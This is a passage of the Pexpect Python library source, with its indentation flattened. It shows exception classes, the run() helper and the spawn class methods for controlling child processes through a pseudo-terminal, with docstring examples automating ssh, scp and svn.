return str(self.value)
def get_trace(self):
'''This returns an abbreviated stack trace with lines that only concern
the caller. In other words, the stack trace inside the Pexpect module
is not included. '''
tblist = traceback.extract_tb(sys.exc_info()[2])
tblist = [item for item in tblist if 'pexpect/__init__' not in item[0]]
tblist = traceback.format_list(tblist)
return ''.join(tblist)
class EOF(ExceptionPexpect):
'''Raised when EOF is read from a child.
This usually means the child has exited.'''
class TIMEOUT(ExceptionPexpect):
'''Raised when a read time exceeds the timeout. '''
##class TIMEOUT_PATTERN(TIMEOUT):
## '''Raised when the pattern match time exceeds the timeout.
## This is different than a read TIMEOUT because the child process may
## give output, thus never give a TIMEOUT, but the output
## may never match a pattern.
## '''
##class MAXBUFFER(ExceptionPexpect):
## '''Raised when a buffer fills before matching an expected pattern.'''
def run(command, timeout=-1, withexitstatus=False, events=None,
extra_args=None, logfile=None, cwd=None, env=None):
'''
This function runs the given command; waits for it to finish; then
returns all output as a string. STDERR is included in output. If the full
path to the command is not given then the path is searched.
Note that lines are terminated by CR/LF (\\r\\n) combination even on
UNIX-like systems because this is the standard for pseudottys. If you set
'withexitstatus' to true, then run will return a tuple of (command_output,
exitstatus). If 'withexitstatus' is false then this returns just
command_output.
The run() function can often be used instead of creating a spawn instance.
For example, the following code uses spawn::
from pexpect import *
child = spawn('scp foo [email protected]:.')
child.expect('(?i)password')
child.sendline(mypassword)
The previous code can be replace with the following::
from pexpect import *
run('scp foo [email protected]:.', events={'(?i)password': mypassword})
**Examples**
Start the apache daemon on the local machine::
from pexpect import *
run("/usr/local/apache/bin/apachectl start")
Check in a file using SVN::
from pexpect import *
run("svn ci -m 'automatic commit' my_file.py")
Run a command and capture exit status::
from pexpect import *
(command_output, exitstatus) = run('ls -l /bin', withexitstatus=1)
The following will run SSH and execute 'ls -l' on the remote machine. The
password 'secret' will be sent if the '(?i)password' pattern is ever seen::
run("ssh [email protected] 'ls -l'",
events={'(?i)password':'secret\\n'})
This will start mencoder to rip a video from DVD. This will also display
progress ticks every 5 seconds as it runs. For example::
from pexpect import *
def print_ticks(d):
print d['event_count'],
run("mencoder dvd://1 -o video.avi -oac copy -ovc copy",
events={TIMEOUT:print_ticks}, timeout=5)
The 'events' argument should be a dictionary of patterns and responses.
Whenever one of the patterns is seen in the command out run() will send the
associated response string. Note that you should put newlines in your
string if Enter is necessary. The responses may also contain callback
functions. Any callback is function that takes a dictionary as an argument.
The dictionary contains all the locals from the run() function, so you can
access the child spawn object or any other variable defined in run()
(event_count, child, and extra_args are the most useful). A callback may
return True to stop the current run process otherwise run() continues until
the next event. A callback may also return a string which will be sent to
the child. 'extra_args' is not used by directly run(). It provides a way to
pass data to a callback function through run() through the locals
dictionary passed to a callback.
'''
return _run(command, timeout=timeout, withexitstatus=withexitstatus,
events=events, extra_args=extra_args, logfile=logfile, cwd=cwd,
env=env, _spawn=spawn)
def runu(command, timeout=-1, withexitstatus=False, events=None,
extra_args=None, logfile=None, cwd=None, env=None, **kwargs):
"""This offers the same interface as :func:`run`, but using unicode.
Like :class:`spawnu`, you can pass ``encoding`` and ``errors`` parameters,
which will be used for both input and output.
"""
return _run(command, timeout=timeout, withexitstatus=withexitstatus,
events=events, extra_args=extra_args, logfile=logfile, cwd=cwd,
env=env, _spawn=spawnu, **kwargs)
def _run(command, timeout, withexitstatus, events, extra_args, logfile, cwd,
env, _spawn, **kwargs):
if timeout == -1:
child = _spawn(command, maxread=2000, logfile=logfile, cwd=cwd, env=env,
**kwargs)
else:
child = _spawn(command, timeout=timeout, maxread=2000, logfile=logfile,
cwd=cwd, env=env, **kwargs)
if events is not None:
patterns = list(events.keys())
responses = list(events.values())
else:
# This assumes EOF or TIMEOUT will eventually cause run to terminate.
patterns = None
responses = None
child_result_list = []
event_count = 0
while True:
try:
index = child.expect(patterns)
if isinstance(child.after, child.allowed_string_types):
child_result_list.append(child.before + child.after)
else:
# child.after may have been a TIMEOUT or EOF,
# which we don't want appended to the list.
child_result_list.append(child.before)
if isinstance(responses[index], child.allowed_string_types):
child.send(responses[index])
elif isinstance(responses[index], types.FunctionType):
callback_result = responses[index](locals())
sys.stdout.flush()
if isinstance(callback_result, child.allowed_string_types):
child.send(callback_result)
elif callback_result:
break
else:
raise TypeError('The callback must be a string or function.')
event_count = event_count + 1
except TIMEOUT:
child_result_list.append(child.before)
break
except EOF:
child_result_list.append(child.before)
break
child_result = child.string_type().join(child_result_list)
if withexitstatus:
child.close()
return (child_result, child.exitstatus)
else:
return child_result
class spawn(object):
'''This is the main class interface for Pexpect. Use this class to start
and control child applications. '''
string_type = bytes
if PY3:
allowed_string_types = (bytes, str)
@staticmethod
def _chr(c):
return bytes([c])
linesep = os.linesep.encode('ascii')
@staticmethod
def write_to_stdout(b):
try:
return sys.stdout.buffer.write(b)
except AttributeError:
# If stdout has been replaced, it may not have .buffer
return sys.stdout.write(b.decode('ascii', 'replace'))
else:
allowed_string_types = (basestring,) # analysis:ignore
_chr = staticmethod(chr)
linesep = os.linesep
write_to_stdout = sys.stdout.write
encoding = None
def __init__(self, command, args=[], timeout=30, maxread=2000,
searchwindowsize=None, logfile=None, cwd=None, env=None,
ignore_sighup=True):
'''This is the constructor. The command parameter may be a string that
includes a command and any arguments to the command. For example::
child = pexpect.spawn('/usr/bin/ftp')
child = pexpect.spawn('/usr/bin/ssh [email protected]')
child = pexpect.spawn('ls -latr /tmp')
You may also construct it with a list of arguments like so::
child = pexpect.spawn('/usr/bin/ftp', [])
child = pexpect.spawn('/usr/bin/ssh', ['[email protected]'])
child = pexpect.spawn('ls', ['-latr', '/tmp'])
After this the child application will be created and will be ready to
talk to. For normal use, see expect() and send() and sendline().
Remember that Pexpect does NOT interpret shell meta characters such as
redirect, pipe, or wild cards (``>``, ``|``, or ``*``). This is a
common mistake. If you want to run a command and pipe it through
another command then you must also start a shell. For example::
child = pexpect.spawn('/bin/bash -c "ls -l | grep LOG > logs.txt"')
child.expect(pexpect.EOF)
The second form of spawn (where you pass a list of arguments) is useful
in situations where you wish to spawn a command and pass it its own
argument list. This can make syntax more clear. For example, the
following is equivalent to the previous example::
shell_cmd = 'ls -l | grep LOG > logs.txt'
child = pexpect.spawn('/bin/bash', ['-c', shell_cmd])
child.expect(pexpect.EOF)
The maxread attribute sets the read buffer size. This is maximum number
of bytes that Pexpect will try to read from a TTY at one time. Setting
the maxread size to 1 will turn off buffering. Setting the maxread
value higher may help performance in cases where large amounts of
output are read back from the child. This feature is useful in
conjunction with searchwindowsize.
The searchwindowsize attribute sets the how far back in the incoming
seach buffer Pexpect will search for pattern matches. Every time
Pexpect reads some data from the child it will append the data to the
incoming buffer. The default is to search from the beginning of the
incoming buffer each time new data is read from the child. But this is
very inefficient if you are running a command that generates a large
amount of data where you want to match. The searchwindowsize does not
affect the size of the incoming data buffer. You will still have
access to the full buffer after expect() returns.
The logfile member turns on or off logging. All input and output will
be copied to the given file object. Set logfile to None to stop
logging. This is the default. Set logfile to sys.stdout to echo
everything to standard output. The logfile is flushed after each write.
Example log input and output to a file::
child = pexpect.spawn('some_command')
fout = file('mylog.txt','w')
child.logfile = fout
Example log to stdout::
child = pexpect.spawn('some_command')
child.logfile = sys.stdout
The logfile_read and logfile_send members can be used to separately log
the input from the child and output sent to the child. Sometimes you
don't want to see everything you write to the child. You only want to
log what the child sends back. For example::
child = pexpect.spawn('some_command')
child.logfile_read = sys.stdout
To separately log output sent to the child use logfile_send::
self.logfile_send = fout
If ``ignore_sighup`` is True, the child process will ignore SIGHUP
signals. For now, the default is True, to preserve the behaviour of
earlier versions of Pexpect, but you should pass this explicitly if you
want to rely on it.
The delaybeforesend helps overcome a weird behavior that many users
were experiencing. The typical problem was that a user would expect() a
"Password:" prompt and then immediately call sendline() to send the
password. The user would then see that their password was echoed back
to them. Passwords don't normally echo. The problem is caused by the
fact that most applications print out the "Password" prompt and then
turn off stdin echo, but if you send your password before the
application turned off echo, then you get your password echoed.
Normally this wouldn't be a problem when interacting with a human at a
real keyboard. If you introduce a slight delay just before writing then
this seems to clear up the problem. This was such a common problem for
many users that I decided that the default pexpect behavior should be
to sleep just before writing to the child application. 1/20th of a
second (50 ms) seems to be enough to clear up the problem. You can set
delaybeforesend to 0 to return to the old behavior. Most Linux machines
don't like this to be below 0.03. I don't know why.
Note that spawn is clever about finding commands on your path.
It uses the same logic that "which" uses to find executables.
If you wish to get the exit status of the child you must call the
close() method. The exit or signal status of the child will be stored
in self.exitstatus or self.signalstatus. If the child exited normally
then exitstatus will store the exit return code and signalstatus will
be None. If the child was terminated abnormally with a signal then
signalstatus will store the signal value and exitstatus will be None.
If you need more detail you can also read the self.status member which
stores the status returned by os.waitpid. You can interpret this using
os.WIFEXITED/os.WEXITSTATUS or os.WIFSIGNALED/os.TERMSIG. '''
self.STDIN_FILENO = pty.STDIN_FILENO
self.STDOUT_FILENO = pty.STDOUT_FILENO
self.STDERR_FILENO = pty.STDERR_FILENO
self.stdin = sys.stdin
self.stdout = sys.stdout
self.stderr = sys.stderr
self.searcher = None
self.ignorecase = False
self.before = None
self.after = None
self.match = None
self.match_index = None
self.terminated = True
self.exitstatus = None
self.signalstatus = None
# status returned by os.waitpid
self.status = None
self.flag_eof = False
self.pid = None
# the chile filedescriptor is initially closed
self.child_fd = -1
self.timeout = timeout
self.delimiter = EOF
self.logfile = logfile
# input from child (read_nonblocking)
self.logfile_read = None
# output to send (send, sendline)
self.logfile_send = None
# max bytes to read at one time into buffer
self.maxread = maxread
# This is the read buffer. See maxread.
self.buffer = self.string_type()
# Data before searchwindowsize point is preserved, but not searched.
self.searchwindowsize = searchwindowsize
# Delay used before sending data to child. Time in seconds.
# Most Linux machines don't like this to be below 0.03 (30 ms).
self.delaybeforesend = 0.05
# Used by close() to give kernel time to update process status.
# Time in seconds.
self.delayafterclose = 0.1
# Used by terminate() to give kernel time to update process status.
# Time in seconds.
self.delayafterterminate = 0.1
self.softspace = False
self.name = '<' + repr(self) + '>'
self.closed = True
self.cwd = cwd
self.env = env
self.ignore_sighup = ignore_sighup
# This flags if we are running on irix
self.__irix_hack = (sys.platform.lower().find('irix') >= 0)
# Solaris uses internal __fork_pty(). All others use pty.fork().
if ((sys.platform.lower().find('solaris') >= 0)
or (sys.platform.lower().find('sunos5') >= 0)):
self.use_native_pty_fork = False
else:
self.use_native_pty_fork = True
# Support subclasses that do not use command or args.
if command is None:
self.command = None
self.args = None
self.name = '<pexpect factory incomplete>'
else:
self._spawn(command, args)
@staticmethod
def _coerce_expect_string(s):
if not isinstance(s, bytes):
return s.encode('ascii')
return s
@staticmethod
def _coerce_send_string(s):
if not isinstance(s, bytes):
return s.encode('utf-8')
return s
@staticmethod
def _coerce_read_string(s):
return s
def __del__(self):
'''This makes sure that no system resources are left open. Python only
garbage collects Python objects. OS file descriptors are not Python
objects, so they must be handled explicitly. If the child file
descriptor was opened outside of this class (passed to the constructor)
then this does not close it. '''
if not self.closed:
# It is possible for __del__ methods to execute during the
# teardown of the Python VM itself. Thus self.close() may
# trigger an exception because os.close may be None.
try:
self.close()
# which exception, shouldnt' we catch explicitly .. ?
except:
pass
def __str__(self):
'''This returns a human-readable string that represents the state of
the object. '''
s = []
s.append(repr(self))
s.append('version: ' + __version__)
s.append('command: ' + str(self.command))
s.append('args: %r' % (self.args,))
s.append('searcher: %r' % (self.searcher,))
s.append('buffer (last 100 chars): %r' % (self.buffer)[-100:],)
s.append('before (last 100 chars): %r' % (self.before)[-100:],)
s.append('after: %r' % (self.after,))
s.append('match: %r' % (self.match,))
s.append('match_index: ' + str(self.match_index))
s.append('exitstatus: ' + str(self.exitstatus))
s.append('flag_eof: ' + str(self.flag_eof))
s.append('pid: ' + str(self.pid))
s.append('child_fd: ' + str(self.child_fd))
s.append('closed: ' + str(self.closed))
s.append('timeout: ' + str(self.timeout))
s.append('delimiter: ' + str(self.delimiter))
s.append('logfile: ' + str(self.logfile))
s.append('logfile_read: ' + str(self.logfile_read))
s.append('logfile_send: ' + str(self.logfile_send))
s.append('maxread: ' + str(self.maxread))
s.append('ignorecase: ' + str(self.ignorecase))
s.append('searchwindowsize: ' + str(self.searchwindowsize))
s.append('delaybeforesend: ' + str(self.delaybeforesend))
s.append('delayafterclose: ' + str(self.delayafterclose))
s.append('delayafterterminate: ' + str(self.delayafterterminate))
return '\n'.join(s)
def _spawn(self, command, args=[]):
'''This starts the given command in a child process. This does all the
fork/exec type of stuff for a pty. This is called by __init__. If args
is empty then command will be parsed (split on spaces) and args will be
set to parsed arguments. '''
# The pid and child_fd of this object get set by this method.
# Note that it is difficult for this method to fail.
# You cannot detect if the child process cannot start.
# So the only way you can tell if the child process started
# or not is to try to read from the file descriptor. If you get
# EOF immediately then it means that the child is already dead.
# That may not necessarily be bad because you may have spawned a child
# that performs some task; creates no stdout output; and then dies.
# If command is an int type then it may represent a file descriptor.
if isinstance(command, type(0)):
raise ExceptionPexpect('Command is an int type. ' +
'If this is a file descriptor then maybe you want to ' +
'use fdpexpect.fdspawn which takes an existing ' +
'file descriptor instead of a command string.')
if not isinstance(args, type([])):
raise TypeError('The argument, args, must be a list.')
if args == []:
self.args = split_command_line(command)
self.command = self.args[0]
else:
# Make a shallow copy of the args list.
self.args = args[:]
self.args.insert(0, command)
self.command = command
command_with_path = which(self.command)
if command_with_path is None:
raise ExceptionPexpect('The command was not found or was not ' +
'executable: %s.' % self.command)
self.command = command_with_path
self.args[0] = self.command
self.name = '<' + ' '.join(self.args) + '>'
assert self.pid is None, 'The pid member must be None.'
assert self.command is not None, 'The command member must not be None.'
if self.use_native_pty_fork:
try:
self.pid, self.child_fd = pty.fork()
except OSError:
err = sys.exc_info()[1]
raise ExceptionPexpect('pty.fork() failed: ' + str(err))
else:
# Use internal __fork_pty
self.pid, self.child_fd = self.__fork_pty()
if self.pid == 0:
# Child
try:
# used by setwinsize()
self.child_fd = sys.stdout.fileno()
self.setwinsize(24, 80)
# which exception, shouldnt' we catch explicitly .. ?
except:
# Some platforms do not like setwinsize (Cygwin).
# This will cause problem when running applications that
# are very picky about window size.
# This is a serious limitation, but not a show stopper.
pass
# Do not allow child to inherit open file descriptors from parent.
max_fd = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
for i in range(3, max_fd):
try:
os.close(i)
except OSError:
pass
if self.ignore_sighup:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
if self.cwd is not None:
os.chdir(self.cwd)
if self.env is None:
os.execv(self.command, self.args)
else:
os.execvpe(self.command, self.args, self.env)
# Parent
self.terminated = False
self.closed = False
def __fork_pty(self):
'''This implements a substitute for the forkpty system call. This
should be more portable than the pty.fork() function. Specifically,
this should work on Solaris.
Modified 10.06.05 by Geoff Marshall: Implemented __fork_pty() method to
resolve the issue with Python's pty.fork() not supporting Solaris,
particularly ssh. Based on patch to posixmodule.c authored by Noah
Spurrier::
http://mail.python.org/pipermail/python-dev/2003-May/035281.html
'''
parent_fd, child_fd = os.openpty()
if parent_fd < 0 or child_fd < 0:
raise ExceptionPexpect("Could not open with os.openpty().")
pid = os.fork()
if pid < 0:
raise ExceptionPexpect("Failed os.fork().")
elif pid == 0:
# Child.
os.close(parent_fd)
self.__pty_make_controlling_tty(child_fd)
os.dup2(child_fd, 0)
os.dup2(child_fd, 1)
os.dup2(child_fd, 2)
if child_fd > 2:
os.close(child_fd)
else:
# Parent.
os.close(child_fd)
return pid, parent_fd
def __pty_make_controlling_tty(self, tty_fd):
'''This makes the pseudo-terminal the controlling tty. This should be
more portable than the pty.fork() function. Specifically, this should
work on Solaris. '''
child_name = os.ttyname(tty_fd)
# Disconnect from controlling tty. Harmless if not already connected.
try:
fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
if fd >= 0:
os.close(fd)
# which exception, shouldnt' we catch explicitly .. ?
except:
# Already disconnected. This happens if running inside cron.
pass
os.setsid()
# Verify we are disconnected from controlling tty
# by attempting to open it again.
try:
fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
if fd >= 0:
os.close(fd)
raise ExceptionPexpect('Failed to disconnect from ' +
'controlling tty. It is still possible to open /dev/tty.')
# which exception, shouldnt' we catch explicitly .. ?
except:
# Good! We are disconnected from a controlling tty.
pass
# Verify we can open child pty.
fd = os.open(child_name, os.O_RDWR)
if fd < 0:
raise ExceptionPexpect("Could not open child pty, " + child_name)
else:
os.close(fd)
# Verify we now have a controlling tty.
fd = os.open("/dev/tty", os.O_WRONLY)
if fd < 0:
raise ExceptionPexpect("Could not open controlling tty, /dev/tty")
else:
os.close(fd)
def fileno(self):
'''This returns the file descriptor of the pty for the child.
'''
return self.child_fd
def close(self, force=True):
'''This closes the connection with the child application. Note that
calling close() more than once is valid. This emulates standard Python
behavior with files. Set force to True if you want to make sure that
the child is terminated (SIGKILL is sent if the child ignores SIGHUP
and SIGINT). '''
if not self.closed:
self.flush()
os.close(self.child_fd)
# Give kernel time to update process status.
time.sleep(self.delayafterclose)
if self.isalive():
if not self.terminate(force):
raise ExceptionPexpect('Could not terminate the child.')
self.child_fd = -1
self.closed = True
#self.pid = None
def flush(self):
'''This does nothing. It is here to support the interface for a
File-like object. '''
pass
def isatty(self):
'''This returns True if the file descriptor is open and connected to a
tty(-like) device, else False. '''
return os.isatty(self.child_fd)
def waitnoecho(self, timeout=-1):
'''This waits until the terminal ECHO flag is set False. This returns
True if the echo mode is off. This returns False if the ECHO flag was
not set False before the timeout. This can be used to detect when the
child is waiting for a password. Usually a child application will turn
off echo mode when it is waiting for the user to enter a password. For
example, instead of expecting the "password:" prompt you can wait for
the child to set ECHO off::
p = pexpect.spawn('ssh [email protected]')
p.waitnoecho()
p.sendline(mypassword)
If timeout==-1 then this method will use the value in self.timeout.
If timeout==None then this method to block until ECHO flag is False.
'''
if timeout == -1:
timeout = self.timeout
if timeout is not None:
end_time = time.time() + timeout
while True:
if not self.getecho():
return True
if timeout < 0 and timeout is not None:
return False
if timeout is not None:
timeout = end_time - time.time()
time.sleep(0.1)
def getecho(self):
'''This returns the terminal echo mode. This returns True if echo is
on or False if echo is off. Child applications that are expecting you
to enter a password often set ECHO False. See waitnoecho(). '''
attr = termios.tcgetattr(self.child_fd)
if attr[3] & termios.ECHO:
return True
return False
def setecho(self, state):
'''This sets the terminal echo mode on or off. Note that anything the
child sent before the echo will be lost, so you should be sure that
your input buffer is empty before you call setecho(). For example, the
following will work as expected::
p = pexpect.spawn('cat') # Echo is on by default.
p.sendline('1234') # We expect see this twice from the child...
p.expect(['1234']) # ... once from the tty echo...
p.expect(['1234']) # ... and again from cat itself.
p.setecho(False) # Turn off tty echo
p.sendline('abcd') # We will set this only once (echoed by cat).
p.sendline('wxyz') # We will set this only once (echoed by cat)
p.expect(['abcd'])
p.expect(['wxyz'])
The following WILL NOT WORK because the lines sent before the setecho
will be lost::
p = pexpect.spawn('cat')
p.sendline('1234')
p.setecho(False) # Turn off tty echo
p.sendline('abcd') # We will set this only once (echoed by cat).
p.sendline('wxyz') # We will set this only once (echoed by cat)
p.expect(['1234'])
p.expect(['1234'])
p.expect(['abcd'])
p.expect(['wxyz'])
'''
self.child_fd
attr = termios.tcgetattr(self.child_fd)
if state:
attr[3] = attr[3] | termios.ECHO
else:
attr[3] = attr[3] & ~termios.ECHO
# I tried TCSADRAIN and TCSAFLUSH, but
# these were inconsistent and blocked on some platforms.
# TCSADRAIN would probably be ideal if it worked.
termios.tcsetattr(self.child_fd, termios.TCSANOW, attr)
def _log(self, s, direction):
if self.logfile is not None:
self.logfile.write(s)
self.logfile.flush()
second_log = self.logfile_send if (direction=='send') else self.logfile_read
if second_log is not None:
second_log.write(s)
second_log.flush()
def read_nonblocking(self, size=1, timeout=-1):
'''This reads at most size characters from the child application. It
includes a timeout. If the read does not complete within the timeout
period then a TIMEOUT exception is raised. If the end of file is read
then an EOF exception will be raised. If a log file was set using
setlog() then all data will also be written to the log file.
If timeout is None then the read may block indefinitely.
If timeout is -1 then the self.timeout value is used. If timeout is 0
then the child is polled and if there is no data immediately ready
then this will raise a TIMEOUT exception.
The timeout refers only to the amount of time to read at least one
character. This is not effected by the 'size' parameter, so if you call
read_nonblocking(size=100, timeout=30) and only one character is
available right away then one character will be returned immediately.
It will not wait for 30 seconds for another 99 characters to come in.
This is a wrapper around os.read(). It uses select.select() to
implement the timeout. '''
if self.closed:
raise ValueError('I/O operation on closed file.')
if timeout == -1:
timeout = self.timeout
# Note that some systems such as Solaris do not give an EOF when
# the child dies. In fact, you can still try to read
# from the child_fd -- it will block forever or until TIMEOUT.
# For this case, I test isalive() before doing any reading.
# If isalive() is false, then I pretend that this is the same as EOF.
if not self.isalive():
# timeout of 0 means "poll"
r, w, e = self.__select([self.child_fd], [], [], 0)
if not r:
self.flag_eof = True
raise EOF('End Of File (EOF). Braindead platform.')
elif self.__irix_hack:
# Irix takes a long time before it realizes a child was terminated.
# FIXME So does this mean Irix systems are forced to always have
# FIXME a 2 second delay when calling read_nonblocking? That sucks.
r, w, e = self.__select([self.child_fd], [], [], 2)
if not r and not self.isalive():
self.flag_eof = True
raise EOF('End Of File (EOF). Slow platform.')
r, w, e = self.__select([self.child_fd], [], [], timeout)
if not r:
if not self.isalive():
# Some platforms, such as Irix, will claim that their
# processes are alive; timeout on the select; and
# then finally admit that they are not alive.
self.flag_eof = True
raise EOF('End of File (EOF). Very slow platform.')
else:
raise TIMEOUT('Timeout exceeded.')
if self.child_fd in r:
try:
s = os.read(self.child_fd, size)
except OSError:
# Linux does this
self.flag_eof = True
raise EOF('End Of File (EOF). Exception style platform.')
if s == b'':
# BSD style
self.flag_eof = True
raise EOF('End Of File (EOF). Empty string style platform.')
s = self._coerce_read_string(s)
self._log(s, 'read')
return s
raise ExceptionPexpect('Reached an unexpected state.')
def read(self, size=-1):
'''This reads at most "size" bytes from the file (less if the read hits
EOF before obtaining size bytes). If the size argument is negative or
omitted, read all data until EOF is reached. The bytes are returned as
a string object. An empty string is returned when EOF is encountered
immediately. '''
if size == 0:
return self.string_type()
if size < 0:
# delimiter default is EOF
self.expect(self.delimiter)
return self.before
# I could have done this more directly by not using expect(), but
# I deliberately decided to couple read() to expect() so that
# I would catch any bugs early and ensure consistant behavior.
# It's a little less efficient, but there is less for me to
# worry about if I have to later modify read() or expect().
# Note, it's OK if size==-1 in the regex. That just means it
# will never match anything in which case we stop only on EOF.
cre = re.compile(self._coerce_expect_string('.{%d}' % size), re.DOTALL)
# delimiter default is EOF
index = self.expect([cre, self.delimiter])
if index == 0:
### FIXME self.before should be ''. Should I assert this?
return self.after
return self.before
def readline(self, size=-1):
'''This reads and returns one entire line. The newline at the end of
line is returned as part of the string, unless the file ends without a
newline. An empty string is returned if EOF is encountered immediately.
This looks for a newline as a CR/LF pair (\\r\\n) even on UNIX because
this is what the pseudotty device returns. So contrary to what you may
expect you will receive newlines as \\r\\n.
If the size argument is 0 then an empty string is returned. In all
other cases the size argument is ignored, which is not standard
behavior for a file-like object. '''
if size == 0:
return self.string_type()
# delimiter default is EOF
index = self.expect([b'\r\n', self.delimiter])
if index == 0:
return self.before + b'\r\n'
else:
return self.before
def __iter__(self):
'''This is to support iterators over a file-like object.
'''
return iter(self.readline, self.string_type())
def readlines(self, sizehint=-1):
'''This reads until EOF using readline() and returns a list containing
the lines thus read. The optional 'sizehint' argument is ignored.
Remember, because this reads until EOF that means the child
process should have closed its stdout. If you run this method on
a child that is still running with its stdout open then this
method will block until it timesout.'''
lines = []
while True:
line = self.readline()
if not line:
break
lines.append(line)
return lines
def write(self, s):
'''This is similar to send() except that there is no return value.
'''
self.send(s)
def writelines(self, sequence):
'''This calls write() for each element in the sequence. The sequence
can be any iterable object producing strings, typically a list of
strings. This does not add line separators. There is no return value.
'''
for s in sequence:
self.write(s)
def send(self, s):
'''Sends string ``s`` to the child process, returning the number of
bytes written. If a logfile is specified, a copy is written to that
log. '''
time.sleep(self.delaybeforesend)
s = self._coerce_send_string(s)
self._log(s, 'send')
return self._send(s)
def _send(self, s):
return os.write(self.child_fd, s)
def sendline(self, s=''):
'''Wraps send(), sending string ``s`` to child process, with os.linesep
automatically appended. Returns number of bytes written. '''
n = self.send(s)
n = n + self.send(self.linesep)
return n
def sendcontrol(self, char):
'''Helper method that wraps send() with mnemonic access for sending control
character to the child (such as Ctrl-C or Ctrl-D). For example, to send
Ctrl-G (ASCII 7, bell, '\a')::
child.sendcontrol('g')
See also, sendintr() and sendeof().
'''
char = char.lower()
a = ord(char)
if a >= 97 and a <= 122:
a = a - ord('a') + 1
return self.send(self._chr(a))
d = {'@': 0, '`': 0,
'[': 27, '{': 27,
'\\': 28, '|': 28,
']': 29, '}': 29,
'^': 30, '~': 30,
'_': 31,
'?': 127}
if char not in d:
return 0
return self.send(self._chr(d[char]))
def sendeof(self):
'''This sends an EOF to the child. This sends a character which causes
the pending parent output buffer to be sent to the waiting child
program without waiting for end-of-line. If it is the first character
of the line, the read() in the user program returns 0, which signifies
end-of-file. This means to work as expected a sendeof() has to be
called at the beginning of a line. This method does not send a newline.
It is the responsibility of the caller to ensure the eof is sent at the
beginning of a line. '''
### Hmmm... how do I send an EOF?
###C if ((m = write(pty, *buf, p - *buf)) < 0)
###C return (errno == EWOULDBLOCK) ? n : -1;
#fd = sys.stdin.fileno()
#old = termios.tcgetattr(fd) # remember current state
#attr = termios.tcgetattr(fd)
#attr[3] = attr[3] | termios.ICANON # ICANON must be set to see EOF
#try: # use try/finally to ensure state gets restored
# termios.tcsetattr(fd, termios.TCSADRAIN, attr)
# if hasattr(termios, 'CEOF'):
# os.write(self.child_fd, '%c' % termios.CEOF)
# else:
# # Silly platform does not define CEOF so assume CTRL-D
# os.write(self.child_fd, '%c' % 4)
#finally: # restore state
# termios.tcsetattr(fd, termios.TCSADRAIN, old)
if hasattr(termios, 'VEOF'):
char = ord(termios.tcgetattr(self.child_fd)[6][termios.VEOF])
else:
# platform does not define VEOF so assume CTRL-D
char = 4
self.send(self._chr(char))
def sendintr(self):
'''This sends a SIGINT to the child. It does not require
the SIGINT to be the first character on a line. '''
if hasattr(termios, 'VINTR'):
char = ord(termios.tcgetattr(self.child_fd)[6][termios.VINTR])
else:
# platform does not define VINTR so assume CTRL-C
char = 3
self.send(self._chr(char))
def eof(self):
'''This returns True if the EOF exception was ever raised.
'''
return self.flag_eof
def terminate(self, force=False):
'''This forces a child process to terminate. It starts nicely with
SIGHUP and SIGINT. If "force" is True then moves onto SIGKILL. This
returns True if the child was terminated. This returns False if the
child could not be terminated. '''
if not self.isalive():
return True
try:
self.kill(signal.SIGHUP)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
self.kill(signal.SIGCONT)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
self.kill(signal.SIGINT)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
if force:
self.kill(signal.SIGKILL)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
else:
return False
return False
except OSError:
# I think there are kernel timing issues that sometimes cause
# this to happen. I think isalive() reports True, but the
# process is dead to the kernel.
# Make one last attempt to see if the kernel is up to date.
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
else:
return False
def wait(self):
'''This waits until the child exits. This is a blocking call. This will
not read any data from the child, so this will block forever if the
child has unread output and has terminated. In other words, the child
may have printed output then called exit(), but, the child is
technically still alive until its output is read by the parent. '''
if self.isalive():
pid, status = os.waitpid(self.pid, 0)
else:
raise ExceptionPexpect('Cannot wait for dead child process.')
self.exitstatus = os.WEXITSTATUS(status)
if os.WIFEXITED(status):
self.status = status
self.exitstatus = os.WEXITSTATUS(status)
self.signalstatus = None
self.terminated = True
elif os.WIFSIGNALED(status):
self.status = status
self.exitstatus = None
self.signalstatus = os.WTERMSIG(status)
self.terminated = True
elif os.WIFSTOPPED(status):
# You can't call wait() on a child process in the stopped state.
raise ExceptionPexpect('Called wait() on a stopped child ' +
'process. This is not supported. Is some other ' +
'process attempting job control with our child pid?')
return self.exitstatus
def isalive(self):
'''This tests if the child process is running or not. This is
non-blocking. If the child was terminated then this will read the
exitstatus or signalstatus of the child. This returns True if the child
process appears to be running or False if not. It can take literally
SECONDS for Solaris to return the right status. '''
if self.terminated:
return False
if self.flag_eof:
# This is for Linux, which requires the blocking form
# of waitpid to # get status of a defunct process.
# This is super-lame. The flag_eof would have been set
# in read_nonblocking(), so this should be safe.
waitpid_options = 0
else:
waitpid_options = os.WNOHANG
try:
pid, status = os.waitpid(self.pid, waitpid_options)
except OSError:
err = sys.exc_info()[1]
# No child processes
if err.errno == errno.ECHILD:
raise ExceptionPexpect('isalive() encountered condition ' +
'where "terminated" is 0, but there was no child ' +
'process. Did someone else call waitpid() ' +
'on our process?')
else:
raise err
# I have to do this twice for Solaris.
# I can't even believe that I figured this out...
# If waitpid() returns 0 it means that no child process
# wishes to report, and the value of status is undefined.
if pid == 0:
try:
### os.WNOHANG) # Solaris!
pid, status = os.waitpid(self.pid, waitpid_options)
except OSError as e:
# This should never happen...
if e.errno == errno.ECHILD:
raise ExceptionPexpect('isalive() encountered condition ' +
'that should never happen. There was no child ' +
'process. Did someone else call waitpid() ' +
'on our process?')
else:
raise
# If pid is still 0 after two calls to waitpid() then the process
# really is alive. This seems to work on all platforms, except for
# Irix which seems to require a blocking call on waitpid or select,
# so I let read_nonblocking take care of this situation
# (unfortunately, this requires waiting through the timeout).
if pid == 0:
return True
if pid == 0:
return True
if os.WIFEXITED(status):
self.status = status
self.exitstatus = os.WEXITSTATUS(status)
self.signalstatus = None
self.terminated = True
elif os.WIFSIGNALED(status):
self.status = status
self.exitstatus = None
self.signalstatus = os.WTERMSIG(status)
self.terminated = True
elif os.WIFSTOPPED(status):
raise ExceptionPexpect('isalive() encountered condition ' +
'where child process is stopped. This is not ' +
'supported. Is some other process attempting ' +
'job control with our child pid?')
return False
def kill(self, sig):
